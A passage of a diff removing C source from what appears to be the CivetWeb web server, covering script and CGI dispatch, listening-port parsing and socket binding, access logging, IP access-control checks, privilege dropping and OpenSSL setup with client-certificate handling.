-			 * entire reply. */
-			mg_exec_lua_script(conn, path, NULL);
-		} else {
-			/* Script was in an illegal path */
-			mg_send_http_error(conn, 403, "%s", "Forbidden");
-		}
-#endif
-#if defined(USE_DUKTAPE)
-	} else if (match_prefix(conn->ctx->config[DUKTAPE_SCRIPT_EXTENSIONS],
-	                        strlen(
-	                            conn->ctx->config[DUKTAPE_SCRIPT_EXTENSIONS]),
-	                        path) > 0) {
-		if (is_in_script_path(conn, path)) {
-			/* Call duktape to generate the page */
-			mg_exec_duktape_script(conn, path);
-		} else {
-			/* Script was in an illegal path */
-			mg_send_http_error(conn, 403, "%s", "Forbidden");
-		}
-#endif
-#if !defined(NO_CGI)
-	} else if (match_prefix(conn->ctx->config[CGI_EXTENSIONS],
-	                        strlen(conn->ctx->config[CGI_EXTENSIONS]),
-	                        path) > 0) {
-		if (is_in_script_path(conn, path)) {
-			/* CGI scripts may support all HTTP methods */
-			handle_cgi_request(conn, path);
-		} else {
-			/* Script was in an illegal path */
-			mg_send_http_error(conn, 403, "%s", "Forbidden");
-		}
-#endif /* !NO_CGI */
-	} else if (match_prefix(conn->ctx->config[SSI_EXTENSIONS],
-	                        strlen(conn->ctx->config[SSI_EXTENSIONS]),
-	                        path) > 0) {
-		if (is_in_script_path(conn, path)) {
-			handle_ssi_file_request(conn, path, file);
-		} else {
-			/* Script was in an illegal path */
-			mg_send_http_error(conn, 403, "%s", "Forbidden");
-		}
-#if !defined(NO_CACHING)
-	} else if ((!conn->in_error_handler)
-	           && is_not_modified(conn, &file->stat)) {
-		/* Send 304 "Not Modified" - this must not send any body data */
-		handle_not_modified_static_file_request(conn, file);
-#endif /* !NO_CACHING */
-	} else {
-		handle_static_file_request(conn, path, file, NULL, NULL);
-	}
-}
-
-
-static void
-close_all_listening_sockets(struct mg_context *ctx)
-{
-	unsigned int i;
-	if (!ctx) {
-		return;
-	}
-
-	for (i = 0; i < ctx->num_listening_sockets; i++) {
-		closesocket(ctx->listening_sockets[i].sock);
-		ctx->listening_sockets[i].sock = INVALID_SOCKET;
-	}
-	mg_free(ctx->listening_sockets);
-	ctx->listening_sockets = NULL;
-	mg_free(ctx->listening_socket_fds);
-	ctx->listening_socket_fds = NULL;
-}
-
-
-/* Valid listening port specification is: [ip_address:]port[s]
- * Examples for IPv4: 80, 443s, 127.0.0.1:3128, 192.0.2.3:8080s
- * Examples for IPv6: [::]:80, [::1]:80,
- *   [2001:0db8:7654:3210:FEDC:BA98:7654:3210]:443s
- *   see https://tools.ietf.org/html/rfc3513#section-2.2
- * In order to bind to both, IPv4 and IPv6, you can either add
- * both ports using 8080,[::]:8080, or the short form +8080.
- * Both forms differ in detail: 8080,[::]:8080 create two sockets,
- * one only accepting IPv4 the other only IPv6. +8080 creates
- * one socket accepting IPv4 and IPv6. Depending on the IPv6
- * environment, they might work differently, or might not work
- * at all - it must be tested what options work best in the
- * relevant network environment.
- */
-static int
-parse_port_string(const struct vec *vec, struct socket *so, int *ip_version)
-{
-	unsigned int a, b, c, d, port;
-	int ch, len;
-	const char *cb;
-#if defined(USE_IPV6)
-	char buf[100] = {0};
-#endif
-
-	/* MacOS needs that. If we do not zero it, subsequent bind() will fail.
-	 * Also, all-zeroes in the socket address means binding to all addresses
-	 * for both IPv4 and IPv6 (INADDR_ANY and IN6ADDR_ANY_INIT). */
-	memset(so, 0, sizeof(*so));
-	so->lsa.sin.sin_family = AF_INET;
-	*ip_version = 0;
-
-	/* Initialize port and len as invalid. */
-	port = 0;
-	len = 0;
-
-	/* Test for different ways to format this string */
-	if (sscanf(vec->ptr, "%u.%u.%u.%u:%u%n", &a, &b, &c, &d, &port, &len)
-	    == 5) {
-		/* Bind to a specific IPv4 address, e.g. 192.168.1.5:8080 */
-		so->lsa.sin.sin_addr.s_addr =
-		    htonl((a << 24) | (b << 16) | (c << 8) | d);
-		so->lsa.sin.sin_port = htons((uint16_t)port);
-		*ip_version = 4;
-
-#if defined(USE_IPV6)
-	} else if (sscanf(vec->ptr, "[%49[^]]]:%u%n", buf, &port, &len) == 2
-	           && mg_inet_pton(
-	                  AF_INET6, buf, &so->lsa.sin6, sizeof(so->lsa.sin6))) {
-		/* IPv6 address, examples: see above */
-		/* so->lsa.sin6.sin6_family = AF_INET6; already set by mg_inet_pton
-		 */
-		so->lsa.sin6.sin6_port = htons((uint16_t)port);
-		*ip_version = 6;
-#endif
-
-	} else if ((vec->ptr[0] == '+')
-	           && (sscanf(vec->ptr + 1, "%u%n", &port, &len) == 1)) {
-
-		/* Port is specified with a +, bind to IPv6 and IPv4, INADDR_ANY */
-		/* Add 1 to len for the + character we skipped before */
-		len++;
-
-#if defined(USE_IPV6)
-		/* Set socket family to IPv6, do not use IPV6_V6ONLY */
-		so->lsa.sin6.sin6_family = AF_INET6;
-		so->lsa.sin6.sin6_port = htons((uint16_t)port);
-		*ip_version = 4 + 6;
-#else
-		/* Bind to IPv4 only, since IPv6 is not built in. */
-		so->lsa.sin.sin_port = htons((uint16_t)port);
-		*ip_version = 4;
-#endif
-
-	} else if (sscanf(vec->ptr, "%u%n", &port, &len) == 1) {
-		/* If only port is specified, bind to IPv4, INADDR_ANY */
-		so->lsa.sin.sin_port = htons((uint16_t)port);
-		*ip_version = 4;
-
-	} else if ((cb = strchr(vec->ptr, ':')) != NULL) {
-		/* Could be a hostname */
-		/* Will only work for RFC 952 compliant hostnames,
-		 * starting with a letter, containing only letters,
-		 * digits and hyphen ('-'). Newer specs may allow
-		 * more, but this is not guaranteed here, since it
-		 * may interfere with rules for port option lists. */
-
-		*(char *)cb = 0; /* Use a const cast here and modify the string.
-		                  * We are going to restore the string later. */
-
-		if (mg_inet_pton(
-		        AF_INET, vec->ptr, &so->lsa.sin, sizeof(so->lsa.sin))) {
-			if (sscanf(cb + 1, "%u%n", &port, &len) == 1) {
-				*ip_version = 4;
-				so->lsa.sin.sin_family = AF_INET;
-				so->lsa.sin.sin_port = htons((uint16_t)port);
-				len += (int)(cb - vec->ptr) + 1;
-			} else {
-				port = 0;
-				len = 0;
-			}
-#if defined(USE_IPV6)
-		} else if (mg_inet_pton(AF_INET6,
-		                        vec->ptr,
-		                        &so->lsa.sin6,
-		                        sizeof(so->lsa.sin6))) {
-			if (sscanf(cb + 1, "%u%n", &port, &len) == 1) {
-				*ip_version = 6;
-				so->lsa.sin6.sin6_family = AF_INET6;
-				so->lsa.sin.sin_port = htons((uint16_t)port);
-				len += (int)(cb - vec->ptr) + 1;
-			} else {
-				port = 0;
-				len = 0;
-			}
-#endif
-		}
-
-		*(char *)cb = ':'; /* restore the string */
-
-	} else {
-		/* Parsing failure. */
-	}
-
-	/* sscanf and the option splitting code ensure the following condition
-	 */
-	if ((len < 0) && ((unsigned)len > (unsigned)vec->len)) {
-		*ip_version = 0;
-		return 0;
-	}
-	ch = vec->ptr[len]; /* Next character after the port number */
-	so->is_ssl = (ch == 's');
-	so->ssl_redir = (ch == 'r');
-
-	/* Make sure the port is valid and vector ends with 's', 'r' or ',' */
-	if (is_valid_port(port)
-	    && ((ch == '\0') || (ch == 's') || (ch == 'r') || (ch == ','))) {
-		return 1;
-	}
-
-	/* Reset ip_version to 0 of there is an error */
-	*ip_version = 0;
-	return 0;
-}
-
-
-static int
-set_ports_option(struct mg_context *ctx)
-{
-	const char *list;
-	int on = 1;
-#if defined(USE_IPV6)
-	int off = 0;
-#endif
-	struct vec vec;
-	struct socket so, *ptr;
-
-	struct pollfd *pfd;
-	union usa usa;
-	socklen_t len;
-	int ip_version;
-
-	int portsTotal = 0;
-	int portsOk = 0;
-
-	if (!ctx) {
-		return 0;
-	}
-
-	memset(&so, 0, sizeof(so));
-	memset(&usa, 0, sizeof(usa));
-	len = sizeof(usa);
-	list = ctx->config[LISTENING_PORTS];
-
-	while ((list = next_option(list, &vec, NULL)) != NULL) {
-
-		portsTotal++;
-
-		if (!parse_port_string(&vec, &so, &ip_version)) {
-			mg_cry(fc(ctx),
-			       "%.*s: invalid port spec (entry %i). Expecting list of: %s",
-			       (int)vec.len,
-			       vec.ptr,
-			       portsTotal,
-			       "[IP_ADDRESS:]PORT[s|r]");
-			continue;
-		}
-
-#if !defined(NO_SSL)
-		if (so.is_ssl && ctx->ssl_ctx == NULL) {
-
-			mg_cry(fc(ctx),
-			       "Cannot add SSL socket (entry %i). Is -ssl_certificate "
-			       "option set?",
-			       portsTotal);
-			continue;
-		}
-#endif
-
-		if ((so.sock = socket(so.lsa.sa.sa_family, SOCK_STREAM, 6))
-		    == INVALID_SOCKET) {
-
-			mg_cry(fc(ctx), "cannot create socket (entry %i)", portsTotal);
-			continue;
-		}
-
-#ifdef _WIN32
-		/* Windows SO_REUSEADDR lets many procs binds to a
-		 * socket, SO_EXCLUSIVEADDRUSE makes the bind fail
-		 * if someone already has the socket -- DTL */
-		/* NOTE: If SO_EXCLUSIVEADDRUSE is used,
-		 * Windows might need a few seconds before
-		 * the same port can be used again in the
-		 * same process, so a short Sleep may be
-		 * required between mg_stop and mg_start.
-		 */
-		if (setsockopt(so.sock,
-		               SOL_SOCKET,
-		               SO_EXCLUSIVEADDRUSE,
-		               (SOCK_OPT_TYPE)&on,
-		               sizeof(on)) != 0) {
-
-			/* Set reuse option, but don't abort on errors. */
-			mg_cry(fc(ctx),
-			       "cannot set socket option SO_EXCLUSIVEADDRUSE (entry %i)",
-			       portsTotal);
-		}
-#else
-		if (setsockopt(so.sock,
-		               SOL_SOCKET,
-		               SO_REUSEADDR,
-		               (SOCK_OPT_TYPE)&on,
-		               sizeof(on)) != 0) {
-
-			/* Set reuse option, but don't abort on errors. */
-			mg_cry(fc(ctx),
-			       "cannot set socket option SO_REUSEADDR (entry %i)",
-			       portsTotal);
-		}
-#endif
-
-		if (ip_version > 4) {
-#if defined(USE_IPV6)
-			if (ip_version == 6) {
-				if (so.lsa.sa.sa_family == AF_INET6
-				    && setsockopt(so.sock,
-				                  IPPROTO_IPV6,
-				                  IPV6_V6ONLY,
-				                  (void *)&off,
-				                  sizeof(off)) != 0) {
-
-					/* Set IPv6 only option, but don't abort on errors. */
-					mg_cry(fc(ctx),
-					       "cannot set socket option IPV6_V6ONLY (entry %i)",
-					       portsTotal);
-				}
-			}
-#else
-			mg_cry(fc(ctx), "IPv6 not available");
-			closesocket(so.sock);
-			so.sock = INVALID_SOCKET;
-			continue;
-#endif
-		}
-
-		if (so.lsa.sa.sa_family == AF_INET) {
-
-			len = sizeof(so.lsa.sin);
-			if (bind(so.sock, &so.lsa.sa, len) != 0) {
-				mg_cry(fc(ctx),
-				       "cannot bind to %.*s: %d (%s)",
-				       (int)vec.len,
-				       vec.ptr,
-				       (int)ERRNO,
-				       strerror(errno));
-				closesocket(so.sock);
-				so.sock = INVALID_SOCKET;
-				continue;
-			}
-		}
-#if defined(USE_IPV6)
-		else if (so.lsa.sa.sa_family == AF_INET6) {
-
-			len = sizeof(so.lsa.sin6);
-			if (bind(so.sock, &so.lsa.sa, len) != 0) {
-				mg_cry(fc(ctx),
-				       "cannot bind to IPv6 %.*s: %d (%s)",
-				       (int)vec.len,
-				       vec.ptr,
-				       (int)ERRNO,
-				       strerror(errno));
-				closesocket(so.sock);
-				so.sock = INVALID_SOCKET;
-				continue;
-			}
-		}
-#endif
-		else {
-			mg_cry(fc(ctx),
-			       "cannot bind: address family not supported (entry %i)",
-			       portsTotal);
-			closesocket(so.sock);
-			so.sock = INVALID_SOCKET;
-			continue;
-		}
-
-		if (listen(so.sock, SOMAXCONN) != 0) {
-
-			mg_cry(fc(ctx),
-			       "cannot listen to %.*s: %d (%s)",
-			       (int)vec.len,
-			       vec.ptr,
-			       (int)ERRNO,
-			       strerror(errno));
-			closesocket(so.sock);
-			so.sock = INVALID_SOCKET;
-			continue;
-		}
-
-		if ((getsockname(so.sock, &(usa.sa), &len) != 0)
-		    || (usa.sa.sa_family != so.lsa.sa.sa_family)) {
-
-			int err = (int)ERRNO;
-			mg_cry(fc(ctx),
-			       "call to getsockname failed %.*s: %d (%s)",
-			       (int)vec.len,
-			       vec.ptr,
-			       err,
-			       strerror(errno));
-			closesocket(so.sock);
-			so.sock = INVALID_SOCKET;
-			continue;
-		}
-
-/* Update lsa port in case of random free ports */
-#if defined(USE_IPV6)
-		if (so.lsa.sa.sa_family == AF_INET6) {
-			so.lsa.sin6.sin6_port = usa.sin6.sin6_port;
-		} else
-#endif
-		{
-			so.lsa.sin.sin_port = usa.sin.sin_port;
-		}
-
-		if ((ptr = (struct socket *)
-		         mg_realloc_ctx(ctx->listening_sockets,
-		                        (ctx->num_listening_sockets + 1)
-		                            * sizeof(ctx->listening_sockets[0]),
-		                        ctx)) == NULL) {
-
-			mg_cry(fc(ctx), "%s", "Out of memory");
-			closesocket(so.sock);
-			so.sock = INVALID_SOCKET;
-			continue;
-		}
-
-		if ((pfd = (struct pollfd *)
-		         mg_realloc_ctx(ctx->listening_socket_fds,
-		                        (ctx->num_listening_sockets + 1)
-		                            * sizeof(ctx->listening_socket_fds[0]),
-		                        ctx)) == NULL) {
-
-			mg_cry(fc(ctx), "%s", "Out of memory");
-			closesocket(so.sock);
-			so.sock = INVALID_SOCKET;
-			mg_free(ptr);
-			continue;
-		}
-
-		set_close_on_exec(so.sock, fc(ctx));
-		ctx->listening_sockets = ptr;
-		ctx->listening_sockets[ctx->num_listening_sockets] = so;
-		ctx->listening_socket_fds = pfd;
-		ctx->num_listening_sockets++;
-		portsOk++;
-	}
-
-	if (portsOk != portsTotal) {
-		close_all_listening_sockets(ctx);
-		portsOk = 0;
-	}
-
-	return portsOk;
-}
-
-
-static const char *
-header_val(const struct mg_connection *conn, const char *header)
-{
-	const char *header_value;
-
-	if ((header_value = mg_get_header(conn, header)) == NULL) {
-		return "-";
-	} else {
-		return header_value;
-	}
-}
-
-
-static void
-log_access(const struct mg_connection *conn)
-{
-	const struct mg_request_info *ri;
-	struct mg_file fi;
-	char date[64], src_addr[IP_ADDR_STR_LEN];
-	struct tm *tm;
-
-	const char *referer;
-	const char *user_agent;
-
-	char buf[4096];
-
-	if (!conn || !conn->ctx) {
-		return;
-	}
-
-	if (conn->ctx->config[ACCESS_LOG_FILE] != NULL) {
-		if (mg_fopen(conn,
-		             conn->ctx->config[ACCESS_LOG_FILE],
-		             MG_FOPEN_MODE_APPEND,
-		             &fi) == 0) {
-			fi.access.fp = NULL;
-		}
-	} else {
-		fi.access.fp = NULL;
-	}
-
-	/* Log is written to a file and/or a callback. If both are not set,
-	 * executing the rest of the function is pointless. */
-	if ((fi.access.fp == NULL) && (conn->ctx->callbacks.log_access == NULL)) {
-		return;
-	}
-
-	tm = localtime(&conn->conn_birth_time);
-	if (tm != NULL) {
-		strftime(date, sizeof(date), "%d/%b/%Y:%H:%M:%S %z", tm);
-	} else {
-		mg_strlcpy(date, "01/Jan/1970:00:00:00 +0000", sizeof(date));
-		date[sizeof(date) - 1] = '\0';
-	}
-
-	ri = &conn->request_info;
-
-	sockaddr_to_string(src_addr, sizeof(src_addr), &conn->client.rsa);
-	referer = header_val(conn, "Referer");
-	user_agent = header_val(conn, "User-Agent");
-
-	mg_snprintf(conn,
-	            NULL, /* Ignore truncation in access log */
-	            buf,
-	            sizeof(buf),
-	            "%s - %s [%s] \"%s %s%s%s HTTP/%s\" %d %" INT64_FMT " %s %s",
-	            src_addr,
-	            (ri->remote_user == NULL) ? "-" : ri->remote_user,
-	            date,
-	            ri->request_method ? ri->request_method : "-",
-	            ri->request_uri ? ri->request_uri : "-",
-	            ri->query_string ? "?" : "",
-	            ri->query_string ? ri->query_string : "",
-	            ri->http_version,
-	            conn->status_code,
-	            conn->num_bytes_sent,
-	            referer,
-	            user_agent);
-
-	if (conn->ctx->callbacks.log_access) {
-		conn->ctx->callbacks.log_access(conn, buf);
-	}
-
-	if (fi.access.fp) {
-		int ok = 1;
-		flockfile(fi.access.fp);
-		if (fprintf(fi.access.fp, "%s\n", buf) < 1) {
-			ok = 0;
-		}
-		if (fflush(fi.access.fp) != 0) {
-			ok = 0;
-		}
-		funlockfile(fi.access.fp);
-		if (mg_fclose(&fi.access) != 0) {
-			ok = 0;
-		}
-		if (!ok) {
-			mg_cry(conn,
-			       "Error writing log file %s",
-			       conn->ctx->config[ACCESS_LOG_FILE]);
-		}
-	}
-}
-
-
-/* Verify given socket address against the ACL.
- * Return -1 if ACL is malformed, 0 if address is disallowed, 1 if allowed.
- */
-static int
-check_acl(struct mg_context *ctx, uint32_t remote_ip)
-{
-	int allowed, flag;
-	uint32_t net, mask;
-	struct vec vec;
-
-	if (ctx) {
-		const char *list = ctx->config[ACCESS_CONTROL_LIST];
-
-		/* If any ACL is set, deny by default */
-		allowed = (list == NULL) ? '+' : '-';
-
-		while ((list = next_option(list, &vec, NULL)) != NULL) {
-			flag = vec.ptr[0];
-			if ((flag != '+' && flag != '-')
-			    || (parse_net(&vec.ptr[1], &net, &mask) == 0)) {
-				mg_cry(fc(ctx),
-				       "%s: subnet must be [+|-]x.x.x.x[/x]",
-				       __func__);
-				return -1;
-			}
-
-			if (net == (remote_ip & mask)) {
-				allowed = flag;
-			}
-		}
-
-		return allowed == '+';
-	}
-	return -1;
-}
-
-
-#if !defined(_WIN32)
-static int
-set_uid_option(struct mg_context *ctx)
-{
-	struct passwd *pw;
-	if (ctx) {
-		const char *uid = ctx->config[RUN_AS_USER];
-		int success = 0;
-
-		if (uid == NULL) {
-			success = 1;
-		} else {
-			if ((pw = getpwnam(uid)) == NULL) {
-				mg_cry(fc(ctx), "%s: unknown user [%s]", __func__, uid);
-			} else if (setgid(pw->pw_gid) == -1) {
-				mg_cry(fc(ctx),
-				       "%s: setgid(%s): %s",
-				       __func__,
-				       uid,
-				       strerror(errno));
-			} else if (setgroups(0, NULL)) {
-				mg_cry(fc(ctx),
-				       "%s: setgroups(): %s",
-				       __func__,
-				       strerror(errno));
-			} else if (setuid(pw->pw_uid) == -1) {
-				mg_cry(fc(ctx),
-				       "%s: setuid(%s): %s",
-				       __func__,
-				       uid,
-				       strerror(errno));
-			} else {
-				success = 1;
-			}
-		}
-
-		return success;
-	}
-	return 0;
-}
-#endif /* !_WIN32 */
-
-
-static void
-tls_dtor(void *key)
-{
-	struct mg_workerTLS *tls = (struct mg_workerTLS *)key;
-	/* key == pthread_getspecific(sTlsKey); */
-
-	if (tls) {
-		if (tls->is_master == 2) {
-			tls->is_master = -3; /* Mark memory as dead */
-			mg_free(tls);
-		}
-	}
-	pthread_setspecific(sTlsKey, NULL);
-}
-
-
-#if !defined(NO_SSL)
-
-static int
-ssl_use_pem_file(struct mg_context *ctx, const char *pem, const char *chain);
-static const char *ssl_error(void);
-
-
-static int
-refresh_trust(struct mg_connection *conn)
-{
-	static int reload_lock = 0;
-	static long int data_check = 0;
-	volatile int *p_reload_lock = (volatile int *)&reload_lock;
-
-	struct stat cert_buf;
-	long int t;
-	const char *pem;
-	const char *chain;
-	int should_verify_peer;
-
-	if ((pem = conn->ctx->config[SSL_CERTIFICATE]) == NULL) {
-		/* If peem is NULL and conn->ctx->callbacks.init_ssl is not,
-		 * refresh_trust still can not work. */
-		return 0;
-	}
-	chain = conn->ctx->config[SSL_CERTIFICATE_CHAIN];
-	if (chain == NULL) {
-		/* pem is not NULL here */
-		chain = pem;
-	}
-	if (*chain == 0) {
-		chain = NULL;
-	}
-
-	t = data_check;
-	if (stat(pem, &cert_buf) != -1) {
-		t = (long int)cert_buf.st_mtime;
-	}
-
-	if (data_check != t) {
-		data_check = t;
-
-		should_verify_peer = 0;
-		if (conn->ctx->config[SSL_DO_VERIFY_PEER] != NULL) {
-			if (mg_strcasecmp(conn->ctx->config[SSL_DO_VERIFY_PEER], "yes")
-			    == 0) {
-				should_verify_peer = 1;
-			} else if (mg_strcasecmp(conn->ctx->config[SSL_DO_VERIFY_PEER],
-			                         "optional") == 0) {
-				should_verify_peer = 1;
-			}
-		}
-
-		if (should_verify_peer) {
-			char *ca_path = conn->ctx->config[SSL_CA_PATH];
-			char *ca_file = conn->ctx->config[SSL_CA_FILE];
-			if (SSL_CTX_load_verify_locations(conn->ctx->ssl_ctx,
-			                                  ca_file,
-			                                  ca_path) != 1) {
-				mg_cry(fc(conn->ctx),
-				       "SSL_CTX_load_verify_locations error: %s "
-				       "ssl_verify_peer requires setting "
-				       "either ssl_ca_path or ssl_ca_file. Is any of them "
-				       "present in "
-				       "the .conf file?",
-				       ssl_error());
-				return 0;
-			}
-		}
-
-		if (1 == mg_atomic_inc(p_reload_lock)) {
-			if (ssl_use_pem_file(conn->ctx, pem, chain) == 0) {
-				return 0;
-			}
-			*p_reload_lock = 0;
-		}
-	}
-	/* lock while cert is reloading */
-	while (*p_reload_lock) {
-		sleep(1);
-	}
-
-	return 1;
-}
-
-#ifdef OPENSSL_API_1_1
-#else
-static pthread_mutex_t *ssl_mutexes;
-#endif /* OPENSSL_API_1_1 */
-
-static int
-sslize(struct mg_connection *conn,
-       SSL_CTX *s,
-       int (*func)(SSL *),
-       volatile int *stop_server)
-{
-	int ret, err;
-	int short_trust;
-	unsigned i;
-
-	if (!conn) {
-		return 0;
-	}
-
-	short_trust =
-	    (conn->ctx->config[SSL_SHORT_TRUST] != NULL)
-	    && (mg_strcasecmp(conn->ctx->config[SSL_SHORT_TRUST], "yes") == 0);
-
-	if (short_trust) {
-		int trust_ret = refresh_trust(conn);
-		if (!trust_ret) {
-			return trust_ret;
-		}
-	}
-
-	conn->ssl = SSL_new(s);
-	if (conn->ssl == NULL) {
-		return 0;
-	}
-	SSL_set_app_data(conn->ssl, (char *)conn);
-
-	ret = SSL_set_fd(conn->ssl, conn->client.sock);
-	if (ret != 1) {
-		err = SSL_get_error(conn->ssl, ret);
-		(void)err; /* TODO: set some error message */
-		SSL_free(conn->ssl);
-		conn->ssl = NULL;
-/* Avoid CRYPTO_cleanup_all_ex_data(); See discussion:
- * https://wiki.openssl.org/index.php/Talk:Library_Initialization */
-#ifndef OPENSSL_API_1_1
-		ERR_remove_state(0);
-#endif
-		return 0;
-	}
-
-	/* SSL functions may fail and require to be called again:
-	 * see https://www.openssl.org/docs/manmaster/ssl/SSL_get_error.html
-	 * Here "func" could be SSL_connect or SSL_accept. */
-	for (i = 16; i <= 1024; i *= 2) {
-		ret = func(conn->ssl);
-		if (ret != 1) {
-			err = SSL_get_error(conn->ssl, ret);
-			if ((err == SSL_ERROR_WANT_CONNECT)
-			    || (err == SSL_ERROR_WANT_ACCEPT)
-			    || (err == SSL_ERROR_WANT_READ)
-			    || (err == SSL_ERROR_WANT_WRITE)) {
-				/* Need to retry the function call "later".
-				 * See https://linux.die.net/man/3/ssl_get_error
-				 * This is typical for non-blocking sockets. */
-				if (*stop_server) {
-					/* Don't wait if the server is going to be stopped. */
-					break;
-				}
-				mg_sleep(i);
-
-			} else if (err == SSL_ERROR_SYSCALL) {
-				/* This is an IO error. Look at errno. */
-				err = errno;
-				/* TODO: set some error message */
-				(void)err;
-				break;
-			} else {
-				/* This is an SSL specific error */
-				/* TODO: set some error message */
-				break;
-			}
-
-		} else {
-			/* success */
-			break;
-		}
-	}
-
-	if (ret != 1) {
-		SSL_free(conn->ssl);
-		conn->ssl = NULL;
-/* Avoid CRYPTO_cleanup_all_ex_data(); See discussion:
- * https://wiki.openssl.org/index.php/Talk:Library_Initialization */
-#ifndef OPENSSL_API_1_1
-		ERR_remove_state(0);
-#endif
-		return 0;
-	}
-
-	return 1;
-}
-
-
-/* Return OpenSSL error message (from CRYPTO lib) */
-static const char *
-ssl_error(void)
-{
-	unsigned long err;
-	err = ERR_get_error();
-	return ((err == 0) ? "" : ERR_error_string(err, NULL));
-}
-
-
-static int
-hexdump2string(void *mem, int memlen, char *buf, int buflen)
-{
-	int i;
-	const char hexdigit[] = "0123456789abcdef";
-
-	if ((memlen <= 0) || (buflen <= 0)) {
-		return 0;
-	}
-	if (buflen < (3 * memlen)) {
-		return 0;
-	}
-
-	for (i = 0; i < memlen; i++) {
-		if (i > 0) {
-			buf[3 * i - 1] = ' ';
-		}
-		buf[3 * i] = hexdigit[(((uint8_t *)mem)[i] >> 4) & 0xF];
-		buf[3 * i + 1] = hexdigit[((uint8_t *)mem)[i] & 0xF];
-	}
-	buf[3 * memlen - 1] = 0;
-
-	return 1;
-}
-
-
-static void
-ssl_get_client_cert_info(struct mg_connection *conn)
-{
-	X509 *cert = SSL_get_peer_certificate(conn->ssl);
-	if (cert) {
-		char str_subject[1024];
-		char str_issuer[1024];
-		char str_finger[1024];
-		unsigned char buf[256];
-		char *str_serial = NULL;
-		unsigned int ulen;
-		int ilen;
-		unsigned char *tmp_buf;
-		unsigned char *tmp_p;
-
-		/* Handle to algorithm used for fingerprint */
-		const EVP_MD *digest = EVP_get_digestbyname("sha1");
-
-		/* Get Subject and issuer */
-		X509_NAME *subj = X509_get_subject_name(cert);
-		X509_NAME *iss = X509_get_issuer_name(cert);
-
-		/* Get serial number */
-		ASN1_INTEGER *serial = X509_get_serialNumber(cert);
-
-		/* Translate serial number to a hex string */
-		BIGNUM *serial_bn = ASN1_INTEGER_to_BN(serial, NULL);
-		str_serial = BN_bn2hex(serial_bn);
-		BN_free(serial_bn);
-
-		/* Translate subject and issuer to a string */
-		(void)X509_NAME_oneline(subj, str_subject, (int)sizeof(str_subject));
-		(void)X509_NAME_oneline(iss, str_issuer, (int)sizeof(str_issuer));
-
-		/* Calculate SHA1 fingerprint and store as a hex string */
-		ulen = 0;
-
-		/* ASN1_digest is deprecated. Do the calculation manually,
-		 * using EVP_Digest. */
-		ilen = i2d_X509(cert, NULL);
-		tmp_buf =
-		    (ilen > 0)
-		        ? (unsigned char *)mg_malloc_ctx((unsigned)ilen + 1, conn->ctx)
-		        : NULL;
-		if (tmp_buf) {
-			tmp_p = tmp_buf;
-			(void)i2d_X509(cert, &tmp_p);
-			if (!EVP_Digest(
-			        tmp_buf, (unsigned)ilen, buf, &ulen, digest, NULL)) {
-				ulen = 0;
-			}
-			mg_free(tmp_buf);
-		}
-
-		if (!hexdump2string(
-		        buf, (int)ulen, str_finger, (int)sizeof(str_finger))) {
-			*str_finger = 0;
-		}
-
-		conn->request_info.client_cert = (struct mg_client_cert *)
-		    mg_malloc_ctx(sizeof(struct mg_client_cert), conn->ctx);
-		if (conn->request_info.client_cert) {
-			conn->request_info.client_cert->subject = mg_strdup(str_subject);
-			conn->request_info.client_cert->issuer = mg_strdup(str_issuer);
-			conn->request_info.client_cert->serial = mg_strdup(str_serial);
-			conn->request_info.client_cert->finger = mg_strdup(str_finger);
-		} else {
-			mg_cry(conn,
-			       "Out of memory: Cannot allocate memory for client "
-			       "certificate");
-		}
-
-		/* Strings returned from bn_bn2hex must be freed using OPENSSL_free,
-		 * see https://linux.die.net/man/3/bn_bn2hex */
-		OPENSSL_free(str_serial);
-
-		/* Free certificate memory */
-		X509_free(cert);
-	}
-}
-
-
-#ifdef OPENSSL_API_1_1
-#else
-static void
-ssl_locking_callback(int mode, int mutex_num, const char *file, int line)
-{
-	(void)line;
-	(void)file;
-
-	if (mode & 1) {
-		/* 1 is CRYPTO_LOCK */
-		(void)pthread_mutex_lock(&ssl_mutexes[mutex_num]);
-	} else {
-		(void)pthread_mutex_unlock(&ssl_mutexes[mutex_num]);
-	}
-}
-#endif /* OPENSSL_API_1_1 */
-
-
-#if !defined(NO_SSL_DL)
-static void *
-load_dll(char *ebuf, size_t ebuf_len, const char *dll_name, struct ssl_func *sw)
-{
-	union {
-		void *p;
-		void (*fp)(void);
-	} u;
-	void *dll_handle;
-	struct ssl_func *fp;
-	int ok;
-	int truncated = 0;
-
-	if ((dll_handle = dlopen(dll_name, RTLD_LAZY)) == NULL) {
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s: cannot load %s",
-		            __func__,
-		            dll_name);
-		return NULL;
-	}
-
-	ok = 1;
-	for (fp = sw; fp->name != NULL; fp++) {
-#ifdef _WIN32
-		/* GetProcAddress() returns pointer to function */
-		u.fp = (void (*)(void))dlsym(dll_handle, fp->name);
-#else
-		/* dlsym() on UNIX returns void *. ISO C forbids casts of data
-		 * pointers to function pointers. We need to use a union to make a
-		 * cast. */
-		u.p = dlsym(dll_handle, fp->name);
-#endif /* _WIN32 */
-		if (u.fp == NULL) {
-			if (ok) {
-				mg_snprintf(NULL,
-				            &truncated,
-				            ebuf,
-				            ebuf_len,
-				            "%s: %s: cannot find %s",
-				            __func__,
-				            dll_name,
-				            fp->name);
-				ok = 0;
-			} else {
-				size_t cur_len = strlen(ebuf);
-				if (!truncated) {
-					mg_snprintf(NULL,
-					            &truncated,
-					            ebuf + cur_len,
-					            ebuf_len - cur_len - 3,
-					            ", %s",
-					            fp->name);
-					if (truncated) {
-						/* If truncated, add "..." */
-						strcat(ebuf, "...");
-					}
-				}
-			}
-			/* Debug:
-			 * printf("Missing function: %s\n", fp->name); */
-		} else {
-			fp->ptr = u.fp;
-		}
-	}
-
-	if (!ok) {
-		(void)dlclose(dll_handle);
-		return NULL;
-	}
-
-	return dll_handle;
-}
-
-
-static void *ssllib_dll_handle;    /* Store the ssl library handle. */
-static void *cryptolib_dll_handle; /* Store the crypto library handle. */
-
-#endif /* NO_SSL_DL */
-
-
-#if defined(SSL_ALREADY_INITIALIZED)
-static int cryptolib_users = 1; /* Reference counter for crypto library. */
-#else
-static int cryptolib_users = 0; /* Reference counter for crypto library. */
-#endif
-
-
-static int
-initialize_ssl(char *ebuf, size_t ebuf_len)
-{
-#ifdef OPENSSL_API_1_1
-	if (ebuf_len > 0) {
-		ebuf[0] = 0;
-	}
-
-#if !defined(NO_SSL_DL)
-	if (!cryptolib_dll_handle) {
-		cryptolib_dll_handle = load_dll(ebuf, ebuf_len, CRYPTO_LIB, crypto_sw);
-		if (!cryptolib_dll_handle) {
